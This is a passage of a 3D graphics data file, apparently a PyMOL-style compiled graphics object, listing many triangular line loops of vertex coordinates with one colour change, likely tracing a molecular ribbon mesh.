VERTEX, 25.512, 37.487, 31.528,
VERTEX, 25.254, 37.572, 31.767,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.512, 37.487, 31.528,
VERTEX, 25.254, 37.572, 31.767,
VERTEX, 25.579, 37.160, 32.108,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.254, 37.572, 31.767,
VERTEX, 25.579, 37.160, 32.108,
VERTEX, 25.346, 37.249, 32.346,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.579, 37.160, 32.108,
VERTEX, 25.346, 37.249, 32.346,
VERTEX, 25.807, 36.882, 32.953,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.346, 37.249, 32.346,
VERTEX, 25.807, 36.882, 32.953,
VERTEX, 25.570, 36.999, 33.201,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.807, 36.882, 32.953,
VERTEX, 25.570, 36.999, 33.201,
VERTEX, 26.062, 36.817, 33.568,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.570, 36.999, 33.201,
VERTEX, 26.062, 36.817, 33.568,
VERTEX, 25.795, 36.968, 33.831,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.062, 36.817, 33.568,
VERTEX, 25.795, 36.968, 33.831,
VERTEX, 26.195, 37.003, 33.594,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.795, 36.968, 33.831,
VERTEX, 26.195, 37.003, 33.594,
VERTEX, 25.889, 37.174, 33.866,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.889, 37.174, 33.866,
VERTEX, 25.551, 37.252, 34.147,
VERTEX, 25.797, 37.497, 33.287,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.551, 37.252, 34.147,
VERTEX, 25.797, 37.497, 33.287,
VERTEX, 25.431, 37.571, 33.571,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.797, 37.497, 33.287,
VERTEX, 25.431, 37.571, 33.571,
VERTEX, 25.573, 37.747, 32.432,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.431, 37.571, 33.571,
VERTEX, 25.573, 37.747, 32.432,
VERTEX, 25.220, 37.801, 32.707,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.573, 37.747, 32.432,
VERTEX, 25.220, 37.801, 32.707,
VERTEX, 25.348, 37.778, 31.803,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.220, 37.801, 32.707,
VERTEX, 25.348, 37.778, 31.803,
VERTEX, 25.042, 37.807, 32.062,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.348, 37.778, 31.803,
VERTEX, 25.042, 37.807, 32.062,
VERTEX, 25.254, 37.572, 31.767,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.042, 37.807, 32.062,
VERTEX, 25.254, 37.572, 31.767,
VERTEX, 25.000, 37.587, 32.013,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.254, 37.572, 31.767,
VERTEX, 25.000, 37.587, 32.013,
VERTEX, 25.346, 37.249, 32.346,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.000, 37.587, 32.013,
VERTEX, 25.346, 37.249, 32.346,
VERTEX, 25.120, 37.268, 32.589,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.346, 37.249, 32.346,
VERTEX, 25.120, 37.268, 32.589,
VERTEX, 25.570, 36.999, 33.201,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.120, 37.268, 32.589,
VERTEX, 25.570, 36.999, 33.201,
VERTEX, 25.331, 37.038, 33.453,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.570, 36.999, 33.201,
VERTEX, 25.331, 37.038, 33.453,
VERTEX, 25.795, 36.968, 33.831,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.331, 37.038, 33.453,
VERTEX, 25.795, 36.968, 33.831,
VERTEX, 25.510, 37.032, 34.098,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.795, 36.968, 33.831,
VERTEX, 25.510, 37.032, 34.098,
VERTEX, 25.889, 37.174, 33.866,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.510, 37.032, 34.098,
VERTEX, 25.889, 37.174, 33.866,
VERTEX, 25.551, 37.252, 34.147,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.551, 37.252, 34.147,
VERTEX, 25.195, 37.213, 34.439,
VERTEX, 25.431, 37.571, 33.571,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.195, 37.213, 34.439,
VERTEX, 25.431, 37.571, 33.571,
VERTEX, 25.050, 37.524, 33.864,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.431, 37.571, 33.571,
VERTEX, 25.050, 37.524, 33.864,
VERTEX, 25.220, 37.801, 32.707,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.050, 37.524, 33.864,
VERTEX, 25.220, 37.801, 32.707,
VERTEX, 24.861, 37.742, 32.992,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.220, 37.801, 32.707,
VERTEX, 24.861, 37.742, 32.992,
VERTEX, 25.042, 37.807, 32.062,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.861, 37.742, 32.992,
VERTEX, 25.042, 37.807, 32.062,
VERTEX, 24.740, 37.740, 32.334,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.042, 37.807, 32.062,
VERTEX, 24.740, 37.740, 32.334,
VERTEX, 25.000, 37.587, 32.013,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.740, 37.740, 32.334,
VERTEX, 25.000, 37.587, 32.013,
VERTEX, 24.757, 37.519, 32.275,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.000, 37.587, 32.013,
VERTEX, 24.757, 37.519, 32.275,
VERTEX, 25.120, 37.268, 32.589,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.757, 37.519, 32.275,
VERTEX, 25.120, 37.268, 32.589,
VERTEX, 24.902, 37.208, 32.850,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.120, 37.268, 32.589,
VERTEX, 24.902, 37.208, 32.850,
VERTEX, 25.331, 37.038, 33.453,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.902, 37.208, 32.850,
VERTEX, 25.331, 37.038, 33.453,
VERTEX, 25.091, 36.990, 33.722,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.331, 37.038, 33.453,
VERTEX, 25.091, 36.990, 33.722,
VERTEX, 25.510, 37.032, 34.098,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.091, 36.990, 33.722,
VERTEX, 25.510, 37.032, 34.098,
VERTEX, 25.212, 36.992, 34.380,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.510, 37.032, 34.098,
VERTEX, 25.212, 36.992, 34.380,
VERTEX, 25.551, 37.252, 34.147,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.212, 36.992, 34.380,
VERTEX, 25.551, 37.252, 34.147,
VERTEX, 25.195, 37.213, 34.439,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.195, 37.213, 34.439,
VERTEX, 24.828, 37.079, 34.696,
VERTEX, 25.050, 37.524, 33.864,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.828, 37.079, 34.696,
VERTEX, 25.050, 37.524, 33.864,
VERTEX, 24.671, 37.379, 34.119,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.050, 37.524, 33.864,
VERTEX, 24.671, 37.379, 34.119,
VERTEX, 24.861, 37.742, 32.992,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.671, 37.379, 34.119,
VERTEX, 24.861, 37.742, 32.992,
VERTEX, 24.514, 37.593, 33.239,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.861, 37.742, 32.992,
VERTEX, 24.514, 37.593, 33.239,
VERTEX, 24.740, 37.740, 32.334,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.514, 37.593, 33.239,
VERTEX, 24.740, 37.740, 32.334,
VERTEX, 24.449, 37.596, 32.573,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.740, 37.740, 32.334,
VERTEX, 24.449, 37.596, 32.573,
VERTEX, 24.757, 37.519, 32.275,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.449, 37.596, 32.573,
VERTEX, 24.757, 37.519, 32.275,
VERTEX, 24.514, 37.384, 32.510,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.757, 37.519, 32.275,
VERTEX, 24.514, 37.384, 32.510,
VERTEX, 24.902, 37.208, 32.850,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.514, 37.384, 32.510,
VERTEX, 24.902, 37.208, 32.850,
VERTEX, 24.671, 37.084, 33.087,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.902, 37.208, 32.850,
VERTEX, 24.671, 37.084, 33.087,
VERTEX, 25.091, 36.990, 33.722,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.671, 37.084, 33.087,
VERTEX, 25.091, 36.990, 33.722,
VERTEX, 24.828, 36.870, 33.967,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.091, 36.990, 33.722,
VERTEX, 24.828, 36.870, 33.967,
VERTEX, 25.212, 36.992, 34.380,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.828, 36.870, 33.967,
VERTEX, 25.212, 36.992, 34.380,
VERTEX, 24.893, 36.868, 34.633,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.212, 36.992, 34.380,
VERTEX, 24.893, 36.868, 34.633,
VERTEX, 25.195, 37.213, 34.439,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.893, 36.868, 34.633,
VERTEX, 25.195, 37.213, 34.439,
VERTEX, 24.828, 37.079, 34.696,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.828, 37.079, 34.696,
VERTEX, 24.454, 36.891, 34.877,
VERTEX, 24.671, 37.379, 34.119,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.454, 36.891, 34.877,
VERTEX, 24.671, 37.379, 34.119,
VERTEX, 24.298, 37.181, 34.294,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.671, 37.379, 34.119,
VERTEX, 24.298, 37.181, 34.294,
VERTEX, 24.514, 37.593, 33.239,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.298, 37.181, 34.294,
VERTEX, 24.514, 37.593, 33.239,
VERTEX, 24.179, 37.394, 33.409,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.514, 37.593, 33.239,
VERTEX, 24.179, 37.394, 33.409,
VERTEX, 24.449, 37.596, 32.573,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.179, 37.394, 33.409,
VERTEX, 24.449, 37.596, 32.573,
VERTEX, 24.166, 37.405, 32.740,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.449, 37.596, 32.573,
VERTEX, 24.166, 37.405, 32.740,
VERTEX, 24.514, 37.384, 32.510,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.166, 37.405, 32.740,
VERTEX, 24.514, 37.384, 32.510,
VERTEX, 24.267, 37.208, 32.679,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.514, 37.384, 32.510,
VERTEX, 24.267, 37.208, 32.679,
VERTEX, 24.671, 37.084, 33.087,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.267, 37.208, 32.679,
VERTEX, 24.671, 37.084, 33.087,
VERTEX, 24.423, 36.918, 33.262,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.671, 37.084, 33.087,
VERTEX, 24.423, 36.918, 33.262,
VERTEX, 24.828, 36.870, 33.967,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.423, 36.918, 33.262,
VERTEX, 24.828, 36.870, 33.967,
VERTEX, 24.543, 36.706, 34.147,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.828, 36.870, 33.967,
VERTEX, 24.543, 36.706, 34.147,
VERTEX, 24.893, 36.868, 34.633,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.543, 36.706, 34.147,
VERTEX, 24.893, 36.868, 34.633,
VERTEX, 24.555, 36.694, 34.817,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.893, 36.868, 34.633,
VERTEX, 24.555, 36.694, 34.817,
VERTEX, 24.828, 37.079, 34.696,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.555, 36.694, 34.817,
VERTEX, 24.828, 37.079, 34.696,
VERTEX, 24.454, 36.891, 34.877,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.454, 36.891, 34.877,
VERTEX, 24.082, 36.653, 34.996,
VERTEX, 24.298, 37.181, 34.294,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.082, 36.653, 34.996,
VERTEX, 24.298, 37.181, 34.294,
VERTEX, 23.934, 36.933, 34.405,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.298, 37.181, 34.294,
VERTEX, 23.934, 36.933, 34.405,
VERTEX, 24.179, 37.394, 33.409,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.934, 36.933, 34.405,
VERTEX, 24.179, 37.394, 33.409,
VERTEX, 23.857, 37.148, 33.516,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.179, 37.394, 33.409,
VERTEX, 23.857, 37.148, 33.516,
VERTEX, 24.166, 37.405, 32.740,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.857, 37.148, 33.516,
VERTEX, 24.166, 37.405, 32.740,
VERTEX, 23.896, 37.173, 32.848,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.166, 37.405, 32.740,
VERTEX, 23.896, 37.173, 32.848,
VERTEX, 24.267, 37.208, 32.679,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.896, 37.173, 32.848,
VERTEX, 24.267, 37.208, 32.679,
VERTEX, 24.027, 36.993, 32.793,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.267, 37.208, 32.679,
VERTEX, 24.027, 36.993, 32.793,
VERTEX, 24.423, 36.918, 33.262,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.027, 36.993, 32.793,
VERTEX, 24.423, 36.918, 33.262,
VERTEX, 24.175, 36.713, 33.383,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.423, 36.918, 33.262,
VERTEX, 24.175, 36.713, 33.383,
VERTEX, 24.543, 36.706, 34.147,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.175, 36.713, 33.383,
VERTEX, 24.543, 36.706, 34.147,
VERTEX, 24.252, 36.498, 34.273,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.543, 36.706, 34.147,
VERTEX, 24.252, 36.498, 34.273,
VERTEX, 24.555, 36.694, 34.817,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.252, 36.498, 34.273,
VERTEX, 24.555, 36.694, 34.817,
VERTEX, 24.213, 36.473, 34.941,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.555, 36.694, 34.817,
VERTEX, 24.213, 36.473, 34.941,
VERTEX, 24.454, 36.891, 34.877,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.213, 36.473, 34.941,
VERTEX, 24.454, 36.891, 34.877,
VERTEX, 24.082, 36.653, 34.996,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.082, 36.653, 34.996,
VERTEX, 23.722, 36.368, 35.062,
VERTEX, 23.934, 36.933, 34.405,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.722, 36.368, 35.062,
VERTEX, 23.934, 36.933, 34.405,
VERTEX, 23.589, 36.638, 34.464,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.934, 36.933, 34.405,
VERTEX, 23.589, 36.638, 34.464,
VERTEX, 23.857, 37.148, 33.516,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.589, 36.638, 34.464,
VERTEX, 23.857, 37.148, 33.516,
VERTEX, 23.558, 36.860, 33.573,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.857, 37.148, 33.516,
VERTEX, 23.558, 36.860, 33.573,
VERTEX, 23.896, 37.173, 32.848,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.558, 36.860, 33.573,
VERTEX, 23.896, 37.173, 32.848,
VERTEX, 23.647, 36.903, 32.911,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.896, 37.173, 32.848,
VERTEX, 23.647, 36.903, 32.911,
VERTEX, 24.027, 36.993, 32.793,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.647, 36.903, 32.911,
VERTEX, 24.027, 36.993, 32.793,
VERTEX, 23.804, 36.742, 32.866,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.027, 36.993, 32.793,
VERTEX, 23.804, 36.742, 32.866,
VERTEX, 24.175, 36.713, 33.383,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.804, 36.742, 32.866,
VERTEX, 24.175, 36.713, 33.383,
VERTEX, 23.937, 36.471, 33.463,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.175, 36.713, 33.383,
VERTEX, 23.937, 36.471, 33.463,
VERTEX, 24.252, 36.498, 34.273,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.937, 36.471, 33.463,
VERTEX, 24.252, 36.498, 34.273,
VERTEX, 23.968, 36.249, 34.354,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.252, 36.498, 34.273,
VERTEX, 23.968, 36.249, 34.354,
VERTEX, 24.213, 36.473, 34.941,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.968, 36.249, 34.354,
VERTEX, 24.213, 36.473, 34.941,
VERTEX, 23.879, 36.206, 35.016,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.213, 36.473, 34.941,
VERTEX, 23.879, 36.206, 35.016,
VERTEX, 24.082, 36.653, 34.996,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.879, 36.206, 35.016,
VERTEX, 24.082, 36.653, 34.996,
VERTEX, 23.722, 36.368, 35.062,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.722, 36.368, 35.062,
VERTEX, 23.387, 36.037, 35.087,
VERTEX, 23.589, 36.638, 34.464,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.387, 36.037, 35.087,
VERTEX, 23.589, 36.638, 34.464,
VERTEX, 23.272, 36.300, 34.483,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.589, 36.638, 34.464,
VERTEX, 23.272, 36.300, 34.483,
VERTEX, 23.558, 36.860, 33.573,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.272, 36.300, 34.483,
VERTEX, 23.558, 36.860, 33.573,
VERTEX, 23.289, 36.534, 33.595,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.558, 36.860, 33.573,
VERTEX, 23.289, 36.534, 33.595,
VERTEX, 23.647, 36.903, 32.911,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.289, 36.534, 33.595,
VERTEX, 23.647, 36.903, 32.911,
VERTEX, 23.427, 36.599, 32.943,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.647, 36.903, 32.911,
VERTEX, 23.427, 36.599, 32.943,
VERTEX, 23.804, 36.742, 32.866,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.427, 36.599, 32.943,
VERTEX, 23.804, 36.742, 32.866,
VERTEX, 23.606, 36.460, 32.909,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.804, 36.742, 32.866,
VERTEX, 23.606, 36.460, 32.909,
VERTEX, 23.937, 36.471, 33.463,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.606, 36.460, 32.909,
VERTEX, 23.937, 36.471, 33.463,
VERTEX, 23.721, 36.196, 33.514,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.937, 36.471, 33.463,
VERTEX, 23.721, 36.196, 33.514,
VERTEX, 23.968, 36.249, 34.354,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.721, 36.196, 33.514,
VERTEX, 23.968, 36.249, 34.354,
VERTEX, 23.704, 35.963, 34.402,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.968, 36.249, 34.354,
VERTEX, 23.704, 35.963, 34.402,
VERTEX, 23.879, 36.206, 35.016,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.704, 35.963, 34.402,
VERTEX, 23.879, 36.206, 35.016,
VERTEX, 23.566, 35.897, 35.054,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.879, 36.206, 35.016,
VERTEX, 23.566, 35.897, 35.054,
VERTEX, 23.722, 36.368, 35.062,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.566, 35.897, 35.054,
VERTEX, 23.722, 36.368, 35.062,
VERTEX, 23.387, 36.037, 35.087,
END,
COLOR, 0.000, 1.000, 0.976,
BEGIN, LINE_LOOP,
VERTEX, 23.387, 36.037, 35.087,
VERTEX, 23.089, 35.662, 35.083,
VERTEX, 23.272, 36.300, 34.483,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.089, 35.662, 35.083,
VERTEX, 23.272, 36.300, 34.483,
VERTEX, 22.995, 35.921, 34.473,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.272, 36.300, 34.483,
VERTEX, 22.995, 35.921, 34.473,
VERTEX, 23.289, 36.534, 33.595,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.995, 35.921, 34.473,
VERTEX, 23.289, 36.534, 33.595,
VERTEX, 23.059, 36.171, 33.592,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.289, 36.534, 33.595,
VERTEX, 23.059, 36.171, 33.592,
VERTEX, 23.427, 36.599, 32.943,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.059, 36.171, 33.592,
VERTEX, 23.427, 36.599, 32.943,
VERTEX, 23.244, 36.265, 32.955,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.427, 36.599, 32.943,
VERTEX, 23.244, 36.265, 32.955,
VERTEX, 23.606, 36.460, 32.909,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.244, 36.265, 32.955,
VERTEX, 23.606, 36.460, 32.909,
VERTEX, 23.442, 36.150, 32.937,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.606, 36.460, 32.909,
VERTEX, 23.442, 36.150, 32.937,
VERTEX, 23.721, 36.196, 33.514,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.442, 36.150, 32.937,
VERTEX, 23.721, 36.196, 33.514,
VERTEX, 23.536, 35.892, 33.547,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.721, 36.196, 33.514,
VERTEX, 23.536, 35.892, 33.547,
VERTEX, 23.704, 35.963, 34.402,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.536, 35.892, 33.547,
VERTEX, 23.704, 35.963, 34.402,
VERTEX, 23.472, 35.642, 34.429,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.704, 35.963, 34.402,
VERTEX, 23.472, 35.642, 34.429,
VERTEX, 23.566, 35.897, 35.054,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.472, 35.642, 34.429,
VERTEX, 23.566, 35.897, 35.054,
VERTEX, 23.286, 35.547, 35.065,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.566, 35.897, 35.054,
VERTEX, 23.286, 35.547, 35.065,
VERTEX, 23.387, 36.037, 35.087,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.286, 35.547, 35.065,
VERTEX, 23.387, 36.037, 35.087,
VERTEX, 23.089, 35.662, 35.083,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.089, 35.662, 35.083,
VERTEX, 22.837, 35.247, 35.061,
VERTEX, 22.995, 35.921, 34.473,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.837, 35.247, 35.061,
VERTEX, 22.995, 35.921, 34.473,
VERTEX, 22.767, 35.500, 34.446,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.995, 35.921, 34.473,
VERTEX, 22.767, 35.500, 34.446,
VERTEX, 23.059, 36.171, 33.592,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.767, 35.500, 34.446,
VERTEX, 23.059, 36.171, 33.592,
VERTEX, 22.879, 35.773, 33.576,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.059, 36.171, 33.592,
VERTEX, 22.879, 35.773, 33.576,
VERTEX, 23.244, 36.265, 32.955,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.879, 35.773, 33.576,
VERTEX, 23.244, 36.265, 32.955,
VERTEX, 23.109, 35.904, 32.961,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.244, 36.265, 32.955,
VERTEX, 23.109, 35.904, 32.961,
VERTEX, 23.442, 36.150, 32.937,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.109, 35.904, 32.961,
VERTEX, 23.442, 36.150, 32.937,
VERTEX, 23.322, 35.818, 32.962,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.442, 36.150, 32.937,
VERTEX, 23.322, 35.818, 32.962,
VERTEX, 23.536, 35.892, 33.547,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.322, 35.818, 32.962,
VERTEX, 23.536, 35.892, 33.547,
VERTEX, 23.393, 35.564, 33.577,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.536, 35.892, 33.547,
VERTEX, 23.393, 35.564, 33.577,
VERTEX, 23.472, 35.642, 34.429,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.393, 35.564, 33.577,
VERTEX, 23.472, 35.642, 34.429,
VERTEX, 23.280, 35.292, 34.447,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.472, 35.642, 34.429,
VERTEX, 23.280, 35.292, 34.447,
VERTEX, 23.286, 35.547, 35.065,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.280, 35.292, 34.447,
VERTEX, 23.286, 35.547, 35.065,
VERTEX, 23.050, 35.160, 35.062,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.286, 35.547, 35.065,
VERTEX, 23.050, 35.160, 35.062,
VERTEX, 23.089, 35.662, 35.083,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.050, 35.160, 35.062,
VERTEX, 23.089, 35.662, 35.083,
VERTEX, 22.837, 35.247, 35.061,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.837, 35.247, 35.061,
VERTEX, 22.646, 34.791, 35.032,
VERTEX, 22.767, 35.500, 34.446,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.646, 34.791, 35.032,
VERTEX, 22.767, 35.500, 34.446,
VERTEX, 22.601, 35.040, 34.412,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.767, 35.500, 34.446,
VERTEX, 22.601, 35.040, 34.412,
VERTEX, 22.879, 35.773, 33.576,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.601, 35.040, 34.412,
VERTEX, 22.879, 35.773, 33.576,
VERTEX, 22.761, 35.342, 33.560,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.879, 35.773, 33.576,
VERTEX, 22.761, 35.342, 33.560,
VERTEX, 23.109, 35.904, 32.961,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.761, 35.342, 33.560,
VERTEX, 23.109, 35.904, 32.961,
VERTEX, 23.031, 35.518, 32.973,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.109, 35.904, 32.961,
VERTEX, 23.031, 35.518, 32.973,
VERTEX, 23.322, 35.818, 32.962,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.031, 35.518, 32.973,
VERTEX, 23.322, 35.818, 32.962,
VERTEX, 23.254, 35.467, 32.997,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.322, 35.818, 32.962,
VERTEX, 23.254, 35.467, 32.997,
VERTEX, 23.393, 35.564, 33.577,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.254, 35.467, 32.997,
VERTEX, 23.393, 35.564, 33.577,
VERTEX, 23.298, 35.218, 33.616,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.393, 35.564, 33.577,
VERTEX, 23.298, 35.218, 33.616,
VERTEX, 23.280, 35.292, 34.447,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.298, 35.218, 33.616,
VERTEX, 23.280, 35.292, 34.447,
VERTEX, 23.139, 34.916, 34.469,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.280, 35.292, 34.447,
VERTEX, 23.139, 34.916, 34.469,
VERTEX, 23.050, 35.160, 35.062,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.139, 34.916, 34.469,
VERTEX, 23.050, 35.160, 35.062,
VERTEX, 22.868, 34.740, 35.056,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.050, 35.160, 35.062,
VERTEX, 22.868, 34.740, 35.056,
VERTEX, 22.837, 35.247, 35.061,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.868, 34.740, 35.056,
VERTEX, 22.837, 35.247, 35.061,
VERTEX, 22.646, 34.791, 35.032,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.646, 34.791, 35.032,
VERTEX, 22.527, 34.297, 35.006,
VERTEX, 22.601, 35.040, 34.412,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.527, 34.297, 35.006,
VERTEX, 22.601, 35.040, 34.412,
VERTEX, 22.514, 34.543, 34.384,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.601, 35.040, 34.412,
VERTEX, 22.514, 34.543, 34.384,
VERTEX, 22.761, 35.342, 33.560,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.514, 34.543, 34.384,
VERTEX, 22.761, 35.342, 33.560,
VERTEX, 22.719, 34.881, 33.554,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.761, 35.342, 33.560,
VERTEX, 22.719, 34.881, 33.554,
VERTEX, 23.031, 35.518, 32.973,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.719, 34.881, 33.554,
VERTEX, 23.031, 35.518, 32.973,
VERTEX, 23.022, 35.113, 33.004,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.031, 35.518, 32.973,
VERTEX, 23.022, 35.113, 33.004,
VERTEX, 23.254, 35.467, 32.997,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.022, 35.113, 33.004,
